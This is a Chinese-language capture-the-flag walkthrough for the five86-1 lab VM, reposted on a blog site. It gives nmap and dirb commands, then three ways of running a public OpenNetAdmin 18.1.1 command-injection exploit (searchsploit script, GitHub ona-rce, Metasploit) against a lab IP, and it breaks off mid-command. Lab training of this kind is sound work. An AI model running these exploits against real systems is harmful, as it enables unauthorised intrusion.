当前位置:   article > 正文

five86-1靶机渗透攻略_exploit failed: one or more options failed to vali

exploit failed: one or more options failed to validate: rhosts. [*] exploit

five86-1攻略

下载地址https://www.five86.com/five86-1.html

主机发现

nmap -sP 192.168.8.0/24 
目标IP地址为 192.168.8.141
  • 1
  • 2

在这里插入图片描述

端口扫描

nmap -A 192.168.8.141 -p- 

发现22ssh、80http、10000Webmin(基于web的unix管理工具)
  • 1
  • 2
  • 3

在这里插入图片描述

访问80端口

空白页面

在这里插入图片描述

后台扫描

dirb http://192.168.8.141 
robots文件里发现一个/ona目录,访问后得到 opennetadmin 的管理页面v18.1.1版本
还有一个登录框,先放着
  • 1
  • 2
  • 3

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

getshell

searchsploit opennetadmin
  • 1

在这里插入图片描述

法一命令注入脚本

直接使用命令注入脚本不好用,要用 dos2unix 47691.sh 命令将dos格式转换成unix格式

 dos2unix 47691.sh
 bash 47691.sh http://192.168.8.141/ona/
  • 1
  • 2

在这里插入图片描述

法二GitHub寻找脚本

https://github.com/amriunix/ona-rce
git clone https://github.com/amriunix/ona-rce.git
  • 1
  • 2
chmod +777 ona-rce.py 给脚本权限
python3 ona-rce.py check http://192.168.8.141/ona/  检查是否能连接目标
python3 ona-rce.py exploit http://192.168.8.141/ona/  开始攻击
  • 1
  • 2
  • 3

在这里插入图片描述

法三使用msf

由于该exp没有被msf收录,我们需要手动添加

/usr/share/metasploit-framework/modules/exploits
在改路径下新建目录opennetadmin
  • 1
  • 2

在这里插入图片描述

                                                                                                                                       
┌──(root
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/在线问答5/article/detail/836405
推荐阅读
相关标签